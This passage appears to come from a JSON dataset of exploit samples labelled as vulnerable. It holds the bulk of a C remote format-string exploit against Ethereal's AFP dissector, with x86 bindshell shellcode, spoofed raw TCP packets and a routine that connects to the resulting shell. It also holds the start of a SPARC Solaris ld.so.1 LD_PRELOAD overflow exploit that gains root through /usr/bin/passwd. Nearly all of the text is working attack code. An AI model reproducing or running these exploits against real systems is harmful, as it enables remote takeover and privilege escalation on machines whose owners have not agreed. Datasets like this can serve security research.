(packet-afp.c) */\n\n\"\\x10\"; /* command=AFP_GETSRVPARAM, for the next packet. */\n\n\n\n/* packet 2's purpose is to follow the path to the buggy function, */\n\n/* [DSIFUNC_WRITE->AFP_GETSRVPARAM->rep=get_name(...)-> */\n\n/* proto_item_set_text(...,rep)]. (use same id as packet 1) */\n\nstatic char payload2[]=\n\n/* DSI start. (packet-dsi.c) */\n\n\"\\x01\" /* reply flag. */\n\n\"\\x06\" /* commad=write. (DSIFUNC_WRITE) */\n\n\"\\x00\\x00\" /* id number, must match packet1. (set later) */\n\n\"\\x00\\x00\\x00\\x00\" /* code=0, can be invalid. */\n\n\"\\x00\\x00\\xff\\xff\" /* length=65535, needs to be somewhat valid. */\n\n\"\\x00\\x00\\x00\\x00\" /* reserved=0, can be invalid. */\n\n/* AFP start. (packet-afp.c) */\n\n\"\\x00\\x00\\x00\\x00\" /* server time=0, can be invalid. */\n\n\"\\x01\" /* volumes=1, must be at least 1. */\n\n\"\\x00\" /* flags=0, can be invalid. */\n\n\"\\x00\"; /* len of volume, <255. (no 0xff, set later) */\n\n/* ...format string(getfmt()) is attached here. */\n\n\n\nstatic char x86_exec[]= /* netric bindshell() code. */\n\n\"\\x31\\xc0\\x50\\x40\\x89\\xc3\\x50\\x40\\x50\\x89\\xe1\\xb0\\x66\"\n\n\"\\xcd\\x80\\x31\\xd2\\x52\\x66\\x68\\xff\\xff\\x43\\x66\\x53\\x89\"\n\n\"\\xe1\\x6a\\x10\\x51\\x50\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x40\\x89\"\n\n\"\\x44\\x24\\x04\\x43\\x43\\xb0\\x66\\xcd\\x80\\x83\\xc4\\x0c\\x52\"\n\n\"\\x52\\x43\\xb0\\x66\\xcd\\x80\\x93\\x89\\xd1\\xb0\\x3f\\xcd\\x80\"\n\n\"\\x41\\x80\\xf9\\x03\\x75\\xf6\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\"\n\n\"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\"\n\n\"\\x80\";\n\n\n\n/* prototypes. (and sig_alarm) */\n\nvoid dsi_connect(unsigned int,unsigned short);\n\nvoid dsi_inject(struct sync_packet,char *,unsigned int);\n\nchar *getfmt(unsigned int,unsigned int);\n\nunsigned short in_cksum(unsigned short *,signed int);\n\nunsigned int getip(char *);\n\nvoid getshell(unsigned int,unsigned short,char *);\n\nvoid printe(char *,signed char);\n\nvoid usage(char *);\n\nvoid sig_alarm(){printe(\"alarm/timeout hit.\",1);}\n\n\n\n/* begin. */\n\nint main(int argc,char **argv) {\n\nsigned int chr=0;\n\nchar *dstname,*srcname,*tmpdata,*fmtptr;\n\nstruct sync_packet sp;\n\nprintf(\"[*] ethereal[v0.10.*]: (AFP) remote format string exploit.\\n\");\n\nprintf(\"[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\\n\\n\");\n\n/* set generic values. */\n\ntbl.amt=DFL_AMOUNT;\n\ntbl.sport=DFL_SHELLPORT;\n\ntbl.port=DSI_SRC_PORT;\n\n/* get command-line options. */\n\nwhile((chr=getopt(argc,argv,\"h:s:p:S:r:P:a:nc\"))!=EOF){\n\nswitch(chr){\n\ncase 'h':\n\nif(!(tbl.daddr=getip(optarg)))\n\nprinte(\"invalid destination host/ip.\",1);\n\nif(!(dstname=(char *)malloc(strlen(optarg)+1)))\n\nprinte(\"malloc() failed.\",1);\n\nstrcpy(dstname,optarg);\n\nbreak;\n\ncase 's':\n\nif(!(tbl.saddr=getip(optarg)))\n\nprinte(\"invalid destination host/ip.\",1);\n\nif(!(srcname=(char *)malloc(strlen(optarg)+1)))\n\nprinte(\"malloc() failed.\",1);\n\nstrcpy(srcname,optarg);\n\nbreak;\n\ncase 'p':\n\ntbl.port=atoi(optarg);\n\nbreak;\n\ncase 'S':\n\ntbl.sport=atoi(optarg);\n\nbreak;\n\ncase 'r':\n\nsscanf(optarg,\"%x\",&tbl.addr);\n\nbreak;\n\ncase 'P':\n\ntbl.pop=atoi(optarg);\n\nbreak;\n\ncase 'a':\n\ntbl.amt=atoi(optarg);\n\nbreak;\n\ncase 'n':\n\ntbl.nospoof=1;\n\nbreak;\n\ncase 'c':\n\ntbl.crash=1;\n\nbreak;\n\ndefault:\n\nusage(argv[0]);\n\nbreak;\n\n}\n\n}\n\n/* initial checks. (3) */\n\nif(!tbl.daddr)\n\nusage(argv[0]);\n\nif((((tbl.addr&0xff000000)>>24)!=0x08||tbl.addr%4)&&!tbl.crash)\n\nprinte(\"address should be in the 0x08XXXXXX range and aligned(%4).\"\n\n\" (-r option)\",1);\n\nif(!tbl.port||!tbl.sport)\n\nprinte(\"0 is not a valid port.\",1);\n\nif(tbl.crash)\n\nprintf(\"[*] crash\\t: yes\\n\\n\");\n\nelse{\n\nprintf(\"[*] address\\t: 0x%.8x\\n\",tbl.addr);\n\nprintf(\"[*] sc address\\t: 0x%.8x (address+%u, for method 2)\\n\",\n\ntbl.addr+SC_JUMP,SC_JUMP);\n\nprintf(\"[*] pops\\t: %u\\n\",tbl.pop);\n\nprintf(\"[*] shell port\\t: %u\\n\",tbl.sport);\n\nprintf(\"[*] spoofed\\t: %s\\n\\n\",tbl.nospoof?\"no\":\"yes\");\n\n/* set the shellcode port. */\n\nx86_exec[20]=(tbl.sport&0xff00)>>8;\n\nx86_exec[21]=(tbl.sport&0x00ff);\n\n}\n\nif(tbl.nospoof){\n\nprintf(\"[*] target: %s:%u\\n\\n\",dstname,tbl.port);\n\ndsi_connect(tbl.daddr,0);\n\nprintf(\"[*] done.\\n\\n\");\n\n}\n\nelse{\n\nif(!tbl.amt)printe(\"no packets?\",1);\n\nprintf(\"[*] destination\\t: %s:%u\\n\",dstname,tbl.port);\n\nprintf(\"[*] source\\t: %s:%u\\n\",(tbl.saddr?srcname:\"<random>\"),\n\nDSI_SRC_PORT);\n\nprintf(\"[*] amount\\t: %u\\n\\n\",tbl.amt);\n\nprintf(\"[+] sending(2x packet = .): \");\n\nfflush(stdout);\n\nwhile(tbl.amt--){\n\n/* spice things up. */\n\nsrandom(time(0)+tbl.amt);\n\n/* keep similar packet values, to ensure the 2nd packet */\n\n/* is recognized as a response to the first. */\n\nsp.daddr=tbl.daddr;\n\nsp.saddr=(tbl.saddr?tbl.saddr:random()%0xffffffff);\n\nsp.dest=htons(tbl.port);\n\n/* make up a \"id\" number. */\n\npayload1[2]=(random()%255+1);\n\npayload1[3]=(random()%255+1);\n\n/* must be the same \"id\" as the first packet. */\n\npayload2[2]=payload1[2];\n\npayload2[3]=payload1[3];\n\n/* SEND PACKET 1. */\n\ndsi_inject(sp,payload1,sizeof(payload1)-1);\n\n/* delay to insure packet arrival time. */\n\nsleep(1);\n\nfmtptr=getfmt(tbl.addr,tbl.pop);\n\n/* set the length of the volume in the packet. (22nd byte) */\n\nif(strlen(fmtptr)>254)\n\nprinte(\"volume string is larger than 254 bytes.\",1);\n\npayload2[22]=(unsigned char)strlen(fmtptr);\n\n/* put payload2[] and the volume data(fmt) together. */\n\nif(!(tmpdata=(char *)malloc(sizeof(payload2)+strlen(fmtptr))))\n\nprinte(\"malloc() failed.\",1);\n\nmemset(tmpdata,0,sizeof(payload2)+strlen(fmtptr));\n\nmemcpy(tmpdata,payload2,sizeof(payload2)-1);\n\nmemcpy(tmpdata+sizeof(payload2)-1,fmtptr,strlen(fmtptr));\n\n/* SEND PACKET 2. */\n\ndsi_inject(sp,tmpdata,sizeof(payload2)-1+strlen(fmtptr));\n\nfree(tmpdata);\n\nprintf(\".\");\n\nfflush(stdout);\n\n/* delay to insure packet arrival time. */\n\nsleep(1);\n\n}\n\nprintf(\"(done)\\n\\n\");\n\n}\n\nfflush(stdout);\n\n/* see if the exploit spawned a remote shell. */\n\nif(!tbl.crash){\n\nprintf(\"[*] pause for remote processing... (10 seconds)\\n\");\n\nsleep(10);\n\ngetshell(tbl.daddr,tbl.sport,dstname);\n\n}\n\nexit(0);\n\n}\n\n\n\n/* (non-spoofed) generic connection. */\n\nvoid dsi_connect(unsigned int daddr,unsigned short port){\n\nsigned int sock=0;\n\nchar *tmpdata,*fmtptr;\n\nstruct sockaddr_in s;\n\nsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\n\n/* set source port to DSI/548. (required) */\n\ns.sin_family=AF_INET;\n\ns.sin_port=htons(DSI_SRC_PORT);\n\ns.sin_addr.s_addr=INADDR_ANY;\n\nif(bind(sock,(struct sockaddr *)&s,sizeof(s)))\n\nprinte(\"bind() failed.\",1);\n\n/* normal routine. */\n\ns.sin_family=AF_INET;\n\ns.sin_port=htons(tbl.port);\n\ns.sin_addr.s_addr=daddr;\n\nprintf(\"[*] attempting to connect...\\n\");\n\nsignal(SIGALRM,sig_alarm);\n\nalarm(TIMEOUT);\n\nif(connect(sock,(struct sockaddr *)&s,sizeof(s)))\n\nprinte(\"(non-spoofed) DSI connection failed.\",1);\n\nalarm(0);\n\nprintf(\"[*] successfully connected.\\n\");\n\n/* make up a \"id\" number. */\n\npayload1[2]=(random()%255+1);\n\npayload1[3]=(random()%255+1);\n\n/* must be the same \"id\" as the first packet. */\n\npayload2[2]=payload1[2];\n\npayload2[3]=payload1[3];\n\nprintf(\"[*] sending first DSI payload. (%u bytes)\\n\",\n\nsizeof(payload1)-1);\n\nwrite(sock,payload1,sizeof(payload1)-1);\n\nusleep(500000);\n\nfmtptr=getfmt(tbl.addr,tbl.pop);\n\n/* set the length of the volume in the packet. */\n\n/* (22nd byte of payload2[]) */\n\nif(strlen(fmtptr)>254)\n\nprinte(\"volume string is larger than 254 bytes.\",1);\n\npayload2[22]=(unsigned char)strlen(fmtptr);\n\n/* put payload2[] and the volume data(fmt) together. */\n\nif(!(tmpdata=(char *)malloc(sizeof(payload2)+strlen(fmtptr))))\n\nprinte(\"malloc() failed.\",1);\n\nmemset(tmpdata,0,sizeof(payload2)+strlen(fmtptr));\n\nmemcpy(tmpdata,payload2,sizeof(payload2)-1);\n\nmemcpy(tmpdata+sizeof(payload2)-1,fmtptr,strlen(fmtptr));\n\nprintf(\"[*] sending second DSI payload. (%u bytes)\\n\",\n\nsizeof(payload2)-1+strlen(fmtptr));\n\nwrite(sock,tmpdata,sizeof(payload2)-1+strlen(fmtptr));\n\nfree(tmpdata);\n\nusleep(500000);\n\nprintf(\"[*] closing connection.\\n\");\n\nclose(sock);\n\nreturn;\n\n}\n\n\n\n/* (spoofed) generates and sends an unestablished (DSI) */\n\n/* TCP(ACK,PUSH) packet. */\n\nvoid dsi_inject(struct sync_packet sp,char *data,unsigned int size){\n\nsigned int sock=0,on=1;\n\nunsigned int psize=0;\n\nchar *p,*s;\n\nstruct sockaddr_in sa;\n\nstruct iph ip;\n\nstruct tcph tcp;\n\nstruct sumh sum;\n\n/* create raw (TCP) socket. */\n\nif((sock=socket(AF_INET,SOCK_RAW,IPPROTO_TCP))<0)\n\nprinte(\"could not allocate raw socket.\",1);\n\n/* allow (on some systems) for the user-supplied ip header. */\n\n#ifdef IP_HDRINCL\n\nif(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)))\n\nprinte(\"could not set IP_HDRINCL socket option.\",1);\n\n#endif\n\nsa.sin_family=AF_INET;\n\nsa.sin_port=htons(DSI_SRC_PORT);\n\nsa.sin_addr.s_addr=sp.daddr;\n\npsize=(sizeof(struct iph)+sizeof(struct tcph)+size);\n\nmemset(&ip,0,sizeof(struct iph));\n\nmemset(&tcp,0,sizeof(struct tcph));\n\n/* values not filled = 0, from the memset() above. */\n\nip.ihl=5;\n\nip.version=4;\n\nip.tot_len=htons(psize);\n\nip.id=(random()%65535);\n\nip.saddr=sp.saddr;\n\nip.daddr=sa.sin_addr.s_addr;\n\nip.ttl=(64*(random()%2+1));\n\nip.protocol=IPPROTO_TCP;\n\nip.frag_off=64;\n\ntcp.seq=(random()%0xffffffff+1);\n\ntcp.source=sa.sin_port;\n\ntcp.dest=sp.dest;\n\ntcp.doff=5;\n\ntcp.ack=1;\n\ntcp.psh=1;\n\ntcp.ack_seq=(random()%0xffffffff+1);\n\ntcp.window=htons(4096*(random()%2+1));\n\n/* needed for (correct) checksums. */\n\nsum.saddr=ip.saddr;\n\nsum.daddr=ip.daddr;\n\nsum.fill=0;\n\nsum.protocol=ip.protocol;\n\nsum.len=htons(sizeof(struct tcph)+size);\n\n/* make sum/calc buffer for the tcp checksum. (correct) */\n\nif(!(s=(char *)malloc(sizeof(struct sumh)+sizeof(struct tcph)\n\n+size+1)))\n\nprinte(\"malloc() failed.\",1);\n\nmemset(s,0,(sizeof(struct sumh)+sizeof(struct tcph)\n\n+size+1));\n\nmemcpy(s,&sum,sizeof(struct sumh));\n\nmemcpy(s+sizeof(struct sumh),&tcp,sizeof(struct tcph));\n\nmemcpy(s+sizeof(struct sumh)+sizeof(struct tcph),\n\ndata,size);\n\ntcp.check=in_cksum((unsigned short *)s,\n\nsizeof(struct sumh)+sizeof(struct tcph)+size);\n\nfree(s);\n\n/* make sum/calc buffer for the ip checksum. (correct) */\n\nif(!(s=(char *)malloc(sizeof(struct iph)+1)))\n\nprinte(\"malloc() failed.\",1);\n\nmemset(s,0,(sizeof(struct iph)+1));\n\nmemcpy(s,&ip,sizeof(struct iph));\n\nip.check=in_cksum((unsigned short *)s,sizeof(struct iph));\n\nfree(s);\n\n/* put the packet together. */\n\nif(!(p=(char *)malloc(psize+1)))\n\nprinte(\"malloc() failed.\",1);\n\nmemset(p,0,psize);\n\nmemcpy(p,&ip,sizeof(struct iph));\n\nmemcpy(p+sizeof(struct iph),&tcp,sizeof(struct tcph));\n\nmemcpy(p+(sizeof(struct iph)+sizeof(struct tcph)),\n\ndata,size);\n\n/* send the malformed DSI/AFP packet. */\n\nif(sendto(sock,p,psize,0,(struct sockaddr *)&sa,\n\nsizeof(struct sockaddr))<psize)\n\nprinte(\"failed to send forged DSI packet.\",1);\n\nfree(p);\n\nreturn;\n\n}\n\n\n\n/* make format string. */\n\nchar *getfmt(unsigned int addr,unsigned int pops){\n\nsigned int i=0,j=0;\n\nchar *buf;\n\n/* simple return if a crash is desired. */\n\nif(tbl.crash)return(CRASH_STR);\n\n/* on-ward. */\n\nif(!(buf=(char *)malloc(256+1)))\n\nprinte(\"malloc() failed.\",1);\n\nmemset(buf,0,(256+1));\n\n/* no need to account for the length of this string into */\n\n/* the address, as the format string is at the beginning. */\n\nif((i=sprintf(buf,\"%%.%uu%%%u$n\",addr,pops))<0)\n\nprinte(\"sprintf() failed.\",1);\n\n/* align in memory/make static size. (works around %u size) */\n\nwhile(i%ALIGN)buf[i++]='X';\n\n/* also for alignment. */\n\nbuf[i++]='X';\n\n/* a fake jump to the nops/shellcode. */\n\nfor(j=i;(j-i)<64;j+=4){*(long *)&buf[j]=(addr+SC_JUMP);}\n\n/* will land here from the addr+SC_JUMP address above. */\n\nmemset(buf+j,0x90,64);\n\nmemcpy(buf+j+64,x86_exec,sizeof(x86_exec));\n\n/* lame method of checking, but so effective. */\n\nif(strlen(buf)<230)\n\nprinte(\"null-byte found in the format string.\",1);\n\nreturn(buf);\n\n}\n\n\n\n/* standard method for creating TCP/IP checksums. */\n\nunsigned short in_cksum(unsigned short *addr,signed int len){\n\nunsigned short answer=0;\n\nregister unsigned short *w=addr;\n\nregister int nleft=len,sum=0;\n\nwhile(nleft>1){\n\nsum+=*w++;\n\nnleft-=2;\n\n}\n\nif(nleft==1){\n\n*(unsigned char *)(&answer)=*(unsigned char *)w;\n\nsum+=answer;\n\n}\n\nsum=(sum>>16)+(sum&0xffff);\n\nsum+=(sum>>16);\n\nanswer=~sum;\n\nreturn(answer);\n\n}\n\n\n\n/* gets the ip from a host/ip/numeric. */\n\nunsigned int getip(char *host){\n\nstruct hostent *t;\n\nunsigned int s=0;\n\nif((s=inet_addr(host))){\n\nif((t=gethostbyname(host)))\n\nmemcpy((char *)&s,(char *)t->h_addr,sizeof(s));\n\n}\n\nif(s==-1)s=0;\n\nreturn(s);\n\n}\n\n\n\n/* bindshell connection routine. */\n\nvoid getshell(unsigned int daddr,unsigned short port,char *dstname){\n\nsigned int sock=0,r=0;\n\nfd_set fds;\n\nchar buf[4096+1];\n\nstruct sockaddr_in sa;\n\nprintf(\"[*] checking to see if the exploit was successful.\\n\");\n\nif((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)\n\nprinte(\"getshell(): socket() failed.\",1);\n\nsa.sin_family=AF_INET;\n\nsa.sin_addr.s_addr=daddr;\n\nsa.sin_port=htons(port);\n\nsignal(SIGALRM,sig_alarm);\n\nalarm(TIMEOUT);\n\nprintf(\"[*] attempting to connect: %s:%d.\\n\",dstname,port);\n\nif(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){\n\nprintf(\"[!] connection failed: %s:%d.\\n\",dstname,port);\n\nreturn;\n\n}\n\nalarm(0);\n\nprintf(\"[*] successfully connected: %s:%d.\\n\\n\",dstname,port);\n\nsignal(SIGINT,SIG_IGN);\n\nwrite(sock,\"uname -a;id;\\n\",14);\n\nwhile(1){\n\nFD_ZERO(&fds);\n\nFD_SET(0,&fds);\n\nFD_SET(sock,&fds);\n\nif(select(sock+1,&fds,0,0,0)<1)\n\nprinte(\"getshell(): select() failed.\",1);\n\nif(FD_ISSET(0,&fds)){\n\nif((r=read(0,buf,4096))<1)\n\nprinte(\"getshell(): read() failed.\",1);\n\nif(write(sock,buf,r)!=r)\n\nprinte(\"getshell(): write() failed.\",1);\n\n}\n\nif(FD_ISSET(sock,&fds)){\n\nif((r=read(sock,buf,4096))<1)\n\nexit(0);\n\nwrite(1,buf,r);\n\n}\n\n}\n\nclose(sock);\n\nreturn;\n\n}\n\n\n\n/* all-purpose error/exit function. */\n\nvoid printe(char *err,signed char e){\n\nprintf(\"[!] %s\\n\",err);\n\nif(e)exit(e);\n\nreturn;\n\n}\n\n\n\n/* command-line usage. */\n\nvoid usage(char *progname){\n\nprintf(\"syntax: %s [-spSrPanc] -h host\\n\\n\",progname);\n\nprintf(\" -h <host/ip>\\ttarget hostname/ip.\\n\");\n\nprintf(\" -s <host/ip>\\tsource hostname/ip. (spoofed)\\n\");\n\nprintf(\" -p <port>\\ttarget port. (dest port)\\n\");\n\nprintf(\" -S <port>\\tshellcode listening port.\\n\");\n\nprintf(\" -r <addr>\\tdefine address. (0x08XXXXXX)\\n\");\n\nprintf(\" -P <value>\\tpop value, distance from start.\\n\");\n\nprintf(\" -a <value>\\tamount of packet(s) to send. (spoofed)\\n\");\n\nprintf(\" -n\\t\\tdon't spoof. (real connection)\\n\");\n\nprintf(\" -c\\t\\tcrash ethereal. (test vulnerability)\\n\\n\");\n\nexit(0);\n\n}\n\n\n\n// milw0rm.com [2005-08-06]",
740        "vulnerable": true
741    },
742    {
743        "exploit_id": 114,
744        "content": "/* #############################\n\n * ## ld.so.1 exploit (SPARC) ##\n\n * #############################\n\n * [coded by: osker178 (bjr213 psu.edu)]\n\n *\n\n * Alright, so this exploits a fairly standard buffer\n\n * overflow in the default Solaris runtime linker (ld.so.1)\n\n * (discovery by Jouko Pynnonen)\n\n * Only real deviation here from the standard overflow\n\n * and return into libc scenario is that at the time that \n\n * overflow occurs, the libc object file has not been loaded; \n\n * so it's not really possible to return into a libc function.\n\n * However, this poses no real problem to us, as ld.so.1 \n\n * provides it's own ___cpy() functions which we can use to \n\n * move our shellcode into an appropriate place in memory.  \n\n *\n\n * Some things to note:\n\n *\n\n *  -  obviously some of the pre-defined addresses will have to be changed\n\n *  \n\n *  -  1124-1128 bytes into our buffer provided to LD_PRELOAD we will end up\n\n *     overwriting a char *; this is actually very helpful for locating where\n\n *     the rest of our information is stored in memory, as this pointer\n\n *     will be used to display another error message, showing us what string \n\n *     is stored at the address we overwrote this pointer with.\n\n *  \n\n *  -  ... eh, that's enough, just look at the code to figure the rest out\n\n */\n\n#include <dlfcn.h>\n\n#include <stdio.h>\n\n#include <signal.h>\n\n#include <setjmp.h>\n\n#include <unistd.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n#include <sys/mman.h>\n\n#include <link.h>\n\n\n\n\n\nchar SPARC_sc[] =\n\n  /* setuid(0) */\n\n  \"\\x90\\x1b\\xc0\\x0f\" /* xor     %o7,%o7,%o0 */\n\n  \"\\x82\\x10\\x20\\x17\" /* mov     23,%g1 | 23 == SYS_setuid()*/\n\n  \"\\x91\\xd0\\x20\\x08\" /* ta      8 */\n\n\n\n  /* setreuid(0,0) - for me at least, these both had to be called */\n\n  \"\\x92\\x1a\\x40\\x09\" /* xor     %o1,%o1,%o1 */\n\n  \"\\x82\\x10\\x20\\xca\" /* mov     202, %g1 | 202 == SYS_setreuid()*/\n\n  \"\\x91\\xd0\\x20\\x08\" /* ta      8 */\n\n\n\n  /* exec(/bin/sh) */\n\n  \"\\x21\\x0b\\xd8\\x9a\" /* sethi   %hi(0x2f626800), %l0 */\n\n  \"\\xa0\\x14\\x21\\x6e\" /* or      %l0, 0x16e, %l0 ! 0x2f62696e */\n\n  \"\\x23\\x0b\\xdc\\xda\" /* sethi   %hi(0x2f736800), %l1 */\n\n  \"\\x90\\x23\\xa0\\x10\" /* sub     %sp, 16, %o0 */\n\n  \"\\x92\\x23\\xa0\\x08\" /* sub     %sp, 8, %o1 */\n\n  \"\\x94\\x1b\\x80\\x0e\" /* xor     %sp, %sp, %o2 */\n\n  \"\\xe0\\x3b\\xbf\\xf0\" /* std     %l0, [%sp - 16] */\n\n  \"\\xd0\\x23\\xbf\\xf8\" /* st      %o0, [%sp - 8] */\n\n  \"\\xc0\\x23\\xbf\\xfc\" /* st      %g0, [%sp - 4] */\n\n  \"\\x82\\x10\\x20\\x3b\" /* mov     59, %g1 | 59 = SYS_execve() */\n\n  \"\\x91\\xd0\\x20\\x08\" /* ta      8 */\n\n;\n\n\n\n\n\nconst long FRAME_ADDR = 0xffbee938;\n\nconst long SHELLCODE_ADDR = 0xffbef17a;   \n\nconst long DESTCPY_ADDR = 0xff3e7118; \n\nconst long DEF_OFFSET = 0x20;\n\n\n\nconst int ENV_STR_SIZE = 2048;\n\nconst int FRAME_SIZE = 64; /* 8 %i regs and 8 %l regs */\n\nconst int DEF_FPAD_LEN = 4;\n\nconst int REC_BUF_SIZE = 1456;\n\n\n\n\n\nchar * get_ld_env(int buf_len, long offset); \n\nchar * get_fake_frame(long offset);\n\nchar * get_envs_str(char fill);\n\nunsigned long get_strcpy_addr();\n\n\n\n\n\n\n\n/* ********************************************** *\n\n * ******************** MAIN ******************** *\n\n * ********************************************** */\n\n\n\nint main(int argc, char **argv)\n\n{\n\n\n\n  char *prog[3];\n\n  char *envs[7];  \n\n  char opt;\n\n  int buf_size = -1;\n\n  int fpad_len = -1;\n\n  long offset = -1;\n\n\n\n  char *ld_pre_env = 0x0;\n\n  char *fake_frame = 0x0;\n\n \n\n\n\n  /* padding of sorts */\n\n  char *envs_str1 = 0x0; \n\n  char *envs_str2 = 0x0; \n\n  char *fpad_buf = 0x0;\n\n\n\n  // ------------------------------------------------ //\n\n  \n\n\n\n  while((opt = getopt(argc, argv, \"s:o:p:\")) != -1)\n\n  {\n\n    switch(opt) {\n\n    case 's':\n\n      if(!optarg) {\n\n\tprintf(\"-s needs size argument\\n\");\n\n\texit(0);\n\n      }\n\n      else\n\n\tbuf_size = atoi(optarg);\n\n      break;\n\n\n\n    case 'o':\n\n      if(!optarg) {\n\n\tprintf(\"-o needs offset argument\\n\");\n\n\texit(0);\n\n      }\n\n      else\n\n\toffset = atol(optarg);\n\n      break;\n\n\n\n    case 'p':\n\n      if(!optarg) {\n\n\tprintf(\"-p needs pad length argument\\n\");\n\n\texit(0);\n\n      }\n\n      else {\n\n\tfpad_len = atoi(optarg);\n\n\tif(fpad_len < 0)\n\n\t  fpad_len = 0;\n\n      }\n\n      break;\n\n\n\n    default:\n\n      printf(\"Usage: %s [-s size] [-o offset] [-p fpad_len]\\n\", argv[0]);\n\n      exit(0);\n\n\n\n    }\n\n    \n\n    argc -= optind;\n\n    argv += optind;\t\n\n  }\n\n  \n\n  printf(\"\\n#######################################\\n\");\n\n  printf(\"# ld.so.1 LD_PRELOAD (SPARC) exploit  #\\n\");\n\n  printf(\"# coded by: osker178 (bjr213@psu.edu) #\\n\");\n\n    printf(\"#######################################\\n\\n\");\n\n\n\n  if(buf_size == -1)\n\n  {\n\n    printf(\"Using default/recommended buffer size of %d\\n\", REC_BUF_SIZE);\n\n    buf_size = REC_BUF_SIZE;\n\n  }\n\n  else if(buf_size % 4)\n\n  {\n\n    buf_size = buf_size + (4 - (buf_size%4));\n\n    printf(\"WARNING: Rounding BUF_SIZE up to 0x%x (%d)\\n\", buf_size, buf_size);\n\n  }\n\n\n\n\n\n  if(offset == -1)\n\n  {\n\n    printf(\"Using default OFFSET of 0x%x (%d)\\n\", DEF_OFFSET, DEF_OFFSET);\n\n    offset = DEF_OFFSET;\n\n  }  \n\n  else if((FRAME_ADDR + offset) % 8)\n\n  {\n\n    offset = offset + (8 - (offset%8));\n\n    printf(\"WARNING: Rounding offset up to 0x%x (%d)\\n\", offset, offset);\n\n    printf(\"(otherwise FRAME_ADDR would not be alligned correctly)\\n\");\n\n  }\n\n\n\n\n\n  if(fpad_len == -1)\n\n  {\n\n    printf(\"Using default FPAD_LEN of 0x%x (%d)\\n\", DEF_FPAD_LEN, DEF_FPAD_LEN);\n\n    fpad_len = DEF_FPAD_LEN;\n\n  }\n\n\n\n  // -------------------------------------------------- //\n\n\n\n\n\n  ld_pre_env = get_ld_env(buf_size, offset);\n\n  if(!ld_pre_env)\n\n    exit(0);\n\n  \n\n  fake_frame = get_fake_frame(offset);\n\n  if(!fake_frame)\n\n    exit(0);\n\n  \n\n  envs_str1 = get_envs_str('1');\n\n  if(!envs_str1)\n\n    exit(0);\n\n\n\n  envs_str2 = get_envs_str('2');\n\n  if(!envs_str2)\n\n    exit(0);\n\n\n\n    \n\n\n\n  // -------------------------------------------------- //\n\n\n\n\n\n  fpad_buf = (char *)malloc(fpad_len+1);\n\n  if(!fpad_buf)\n\n  {\n\n    perror(\"malloc\");\n\n    exit(0);\n\n  }\n\n  memset(fpad_buf, 'F', fpad_len);\n\n  fpad_buf[fpad_len] = '\\0';\n\n  \n\n\n\n  envs[0] = fpad_buf;\n\n  envs[1] = fake_frame;\n\n  envs[2] = envs_str1;\n\n  envs[3] = SPARC_sc;\n\n  envs[4] = envs_str2;\n\n  envs[5] = ld_pre_env;\n\n  envs[6] = NULL;\n\n\n\n  prog[0] = \"/usr/bin/passwd\";\n\n  prog[1] = \"passwd\";\n\n  prog[2] = NULL;\n\n\n\n  execve(prog[0], prog, envs);\n\n\n\n  perror(\"execve\");\n\n\n\n  return 0;\n\n}\n\n\n\n\n\n/* ********************************************** */\n\n\n\n\n\n\n\n\n\n\n\n/* ********************************************** *\n\n * ***************** GET_LD_ENV ***************** *\n\n * ********************************************** */\n\nchar * get_ld_env(int buf_len, long offset)\n\n{\n\n  long *lp;\n\n  char *buf;\n\n  char *ld_pre_env;\n\n  unsigned long strcpy_ret;\n\n\n\n  strcpy_ret = get_strcpy_addr(); \n\n  if(!strcpy_ret)\n\n    return 0;\n\n  else\n\n    printf(\"strcpy found at [0x%x]\\n\\n\", strcpy_ret);\n\n\n\n  /*\n\n   * buf_size --> main requested length (rounded up to nearest factor of 4)\n\n   * +FRAME_SIZE --> for the fake frame values (64 bytes worth) we will overwrite\n\n   * +1 --> for the \"/\" character that must be appended in order to pass the strchr() \n\n   *        and strrchr() tests (see <load_one>: from objdump -d /usr/lib/ld.so.1)\n\n   * +1 --> '\\0' obviously\n\n   */\n\n  buf = (char *)malloc(buf_len + FRAME_SIZE + 1 + 1); \n\n  if(!buf)\n\n  {\n\n    perror(\"malloc\");\n\n    return 0;\n\n  }\n\n\n\n\n\n  memset(buf, 'A', buf_len); \n\n  buf[0] = '/';\n\n  \n\n  /* this is the location of the (char *) in ld.so.1 we are overwriting \n\n   * -> use this to find the address of the environment\n\n   *    arguments (whatever value we write at this address\n\n   *    is what will be displayed in an error message\n\n   *    from ld.so.1 after the error message generated from\n\n   *    our insecure path provided in LD_PRELOAD)\n\n   */\n\n  lp = (long *)(buf + 1124);\n\n  *lp++ = FRAME_ADDR + offset; \n\n\n\n  lp = (long *)(buf + buf_len);\n\n\n\n  /* %l regs - as far as we're concerned, these\n\n   *           values don't matter (i've never\n\n   *           had a problem with them)\n\n   */\n\n  *lp++ = 0x61616161; /* %l0 */\n\n  *lp++ = 0x62626262; /* %l1 */\n\n  *lp++ = 0x63636363; /* %l2 */\n\n  *lp++ = 0x64646464; /* %l3 */\n\n  *lp++ = 0x65656565; /* %l4 */\n\n  *lp++ = 0x66666666; /* %l5 */\n\n  *lp++ = 0x67676767; /* %l6 */\n\n  *lp++ = 0x68686868; /* %l7 */\n\n\n\n  /* %i regs */\n\n  *lp++ = 0x69696969;     /* %i0 */\n\n  *lp++ = 0x70707070;     /* %i1 */\n\n  *lp++ = 0x71717171;     /* %i2 */\n\n  *lp++ = 0x72727272;     /* %i3 */\n\n  *lp++ = 0x73737373;     /* %i4 */\n\n  *lp++ = 0x74747474;     /* %i5 */\n\n  *lp++ = FRAME_ADDR + offset; /* our fake frame/%i6 */\n\n  *lp = strcpy_ret;      /* ret address/%i7 */\n\n  strcat(buf, \"/\");\n\n\n\n\n\n  /* put together our LD_PRELOAD buffer */\n\n  ld_pre_env = (char *)malloc(strlen(buf) + strlen(\"LD_PRELOAD=\") + 1);\n\n  if(!ld_pre_env)\n\n  {\n\n    perror(\"malloc\");\n\n    return 0;\n\n  }\n\n\n\n  strcpy(ld_pre_env, \"LD_PRELOAD=\");\n\n  strcat(ld_pre_env + strlen(ld_pre_env), buf);\n\n  